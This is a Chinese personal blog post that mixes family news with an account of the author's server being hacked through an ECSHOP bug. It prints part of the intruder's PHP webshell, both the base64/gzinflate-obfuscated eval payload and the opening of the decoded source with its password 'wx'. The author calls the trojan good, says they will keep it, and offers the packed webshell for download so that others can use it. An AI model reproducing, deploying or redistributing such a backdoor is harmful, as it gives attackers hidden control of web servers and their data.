eval、gzinflate、 base64_decode三函数加密的代码在线解密

其实，这边日志的主题不是想写被eval、gzinflate、 base64_decode三函数加密的代码的在线解密的。主要写生活中的两三件事。

其一，刘威同学生了个儿子，在这里恭喜一下。俺又多了个侄子，年底回家，连他结婚的喜酒，跟小侄子的见面礼一并给了。（此人已经生子，还未结婚，大家一起来鄙视一下，当然，你也可以羡慕一下。）团队的SCY已经有两个孩子了，一个女儿一个儿子，岁月不饶人啊，哥老了。

其二，前天下午听姐姐说晚上跟今天早上，还有中午打电话回家，都没人接听。我听了之后，有点心慌，也假装镇定到下班回家，先是打了电话到大姐家，接电话的是外甥，其也说也曾经尝试了几次，也是没接通，然后，决定明天去我父母家看望一下（中考完毕），顺便带点农副产品。我听了之后，却愈加担心，也有点欣慰。担心的是家里的电话为什么没人接，欣慰的是外甥很懂事了，也很孝顺他的姥姥，也就是我的父母。接着，我又尝试几遍，仍未有响应。又打了一通电话，后得知家里电话坏了，才放下心来。继续坚持每周一个电话回家。

其三，天气渐热，把去年买的风扇拿出来。安装了一下，发现扇叶以及其他部件都是崭新、一尘不染的，遂不住赞叹自己当初认真清理打扫，收藏放置的态度。

其四，放BLOG的服务器，被入侵了。入口是ECSHOP的BUG引起的。俺也没啥说的，只想对这位“大侠”说：“你爱干吗就干吗，只要别删数据，要是挂黑页，证明你的能力的话，那记得帮俺备份一下，拜谢了”。接着说，顺便发现了其使用的PHP木马，打开看了下源码，加密了。其加密方式为

eval(gzinflate(base64_decode(这种的，见下面代码：

?><?php

eval(gzinflate(base64_decode('HJ3HbuRalkXn9SP1AA7oHdDoAr0NegbNpEDvvefXd6hzkkhJKYV4z9l7rZBE/ed//+c/cz3/61/FmfT/VG8zln2yF/+kyVYQ2H/zIpvy4p9/yyoqp8eeDV040q4OM/d1qQTvsEU0xdNc+wNvmqU1BwhZMTWeIY9ivWSJBrMygUAOgkAGZi8KEjAoDqUHfiXq7UfkEUGge76Rjcjgq8zng800+DxTsk+Hx4swwfTMtXA4XmTGlrElQx2AqB12GwLT/Sz8AaDd1s602lxYoksdwdnaqUGCvfucXfefhFU/

大体代码就这样，没贴完，费了1个多小时，写了解密代码程序，见http://www.cnxct.com/cfc4n/eval-gzinflate-base64_decode.php，方便大家用得到的时候用下。

顺便说下，此PHP木马程序加密了9次左右吧，解密之后的代码为

?><?php

$password = "wx";

error_reporting(E_ERROR);

header("content-Type: text/html; charset=gb2312");

set_time_limit(0);

function Root_GP(&$array)

{

    while(list($key,$var) = each($array))

    {

        if((strtoupper($key) != $key || ''.intval($key) == "$key") && $key != 'argc' && $key != 'argv')

        {

            if(is_string($var)) $array[$key] = stripslashes($var);

            if(is_array($var)) $array[$key] = Root_GP($var);

        }

    }

    return $array;

}

function Root_CSS()

{

哦…..这哥们的密码居然就两位字母，就是wx ，这一不小心还能按对。。PS：这木马不错，留着自己用了。打包在下面，想用的可以拿去。

无图无真相，上传了，提示”临时文件夹丢失。”好吧，好吧，我先写周报，等会再调试。

搞定了，gleon调试，把php.ini中的upload_tmp_dir配置项去掉了，开启之后，给相应目录足够权限即可，比如755.

附件：php木马加密前与加密后的两个文件打包

链接: https://pan.baidu.com/s/1r0RbKXTfEL5FMn49gCxB5g   提取码: b897